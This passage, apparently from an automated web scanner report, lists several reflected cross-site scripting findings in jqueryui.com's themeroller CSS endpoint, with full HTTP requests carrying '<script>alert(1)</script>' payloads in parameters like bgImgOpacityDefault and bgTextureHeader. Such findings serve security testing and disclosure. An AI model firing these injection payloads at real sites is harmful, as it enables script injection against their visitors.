Referer: http://jqueryui.com/themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d"><script>alert(1)</script>2089f77dadf&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: jqueryui.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 16:51:31 GMT
Content-Type: text/css
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 17319


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
ccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75b0ecb<script>alert(1)</script>d03ff2877d9&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefaul
...[SNIP]...

3.112. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgImgOpacityDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the bgImgOpacityDefault request parameter is copied into the HTML document as plain text between tags. The payload 12382<script>alert(1)</script>24ba7d2a748 was submitted in the bgImgOpacityDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=7512382<script>alert(1)</script>24ba7d2a748&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d HTTP/1.1
Accept: text/css
Referer: http://jqueryui.com/themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d"><script>alert(1)</script>2089f77dadf&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: jqueryui.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 16:51:33 GMT
Content-Type: text/css
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 17319


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=7512382<script>alert(1)</script>24ba7d2a748&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgC
...[SNIP]...

3.113. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgImgOpacityHeader parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the bgImgOpacityHeader request parameter is copied into the HTML document as plain text between tags. The payload bb7fe<script>alert(1)</script>300123efbf3 was submitted in the bgImgOpacityHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75bb7fe<script>alert(1)</script>300123efbf3&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d HTTP/1.1
Accept: text/css
Referer: http://jqueryui.com/themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d"><script>alert(1)</script>2089f77dadf&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: jqueryui.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 16:51:30 GMT
Content-Type: text/css
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 17319


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
ui.com/themeroller/?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75bb7fe<script>alert(1)</script>300123efbf3&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=22
...[SNIP]...

3.114. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgImgOpacityHover parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the bgImgOpacityHover request parameter is copied into the HTML document as plain text between tags. The payload 27c2a<script>alert(1)</script>a969c6253b1 was submitted in the bgImgOpacityHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=7527c2a<script>alert(1)</script>a969c6253b1&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d HTTP/1.1
Accept: text/css
Referer: http://jqueryui.com/themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d"><script>alert(1)</script>2089f77dadf&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: jqueryui.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 16:51:35 GMT
Content-Type: text/css
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 17319


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
fault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=7527c2a<script>alert(1)</script>a969c6253b1&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d
*/


/* Component containers
----------------------------------*/
.ui-widget { font-family: Verdana,Arial,sans-se
...[SNIP]...

3.115. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgTextureActive parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the bgTextureActive request parameter is copied into the HTML document as plain text between tags. The payload 33564<script>alert(1)</script>9998b38772e was submitted in the bgTextureActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png33564<script>alert(1)</script>9998b38772e&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee84d7e HTTP/1.1
Accept: text/css
Referer: http://jqueryui.com/themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee84d7e"><script>alert(1)</script>7a510e251a9&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: jqueryui.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 16:53:02 GMT
Content-Type: text/css
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 17454


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
onColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png33564<script>alert(1)</script>9998b38772e&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee84d7e
*/


/* Component containers
----------------------------------*/
.ui-widget { font-f
...[SNIP]...

3.116. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgTextureContent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the bgTextureContent request parameter is copied into the HTML document as plain text between tags. The payload 73ee6<script>alert(1)</script>9215b897fdf was submitted in the bgTextureContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png73ee6<script>alert(1)</script>9215b897fdf&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d HTTP/1.1
Accept: text/css
Referer: http://jqueryui.com/themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d"><script>alert(1)</script>2089f77dadf&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: jqueryui.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 16:51:31 GMT
Content-Type: text/css
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 17314


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
s=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png73ee6<script>alert(1)</script>9215b897fdf&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault
...[SNIP]...

3.117. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgTextureDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the bgTextureDefault request parameter is copied into the HTML document as plain text between tags. The payload 6f8c3<script>alert(1)</script>e2f9b13ed0e was submitted in the bgTextureDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png6f8c3<script>alert(1)</script>e2f9b13ed0e&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d HTTP/1.1
Accept: text/css
Referer: http://jqueryui.com/themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d"><script>alert(1)</script>2089f77dadf&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: jqueryui.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 16:51:33 GMT
Content-Type: text/css
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 17315


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
r=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png6f8c3<script>alert(1)</script>e2f9b13ed0e&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&ic
...[SNIP]...

3.118. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgTextureHeader parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the bgTextureHeader request parameter is copied into the HTML document as plain text between tags. The payload acecc<script>alert(1)</script>26b01a07e1b was submitted in the bgTextureHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.pngacecc<script>alert(1)</script>26b01a07e1b&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d HTTP/1.1
Accept: text/css
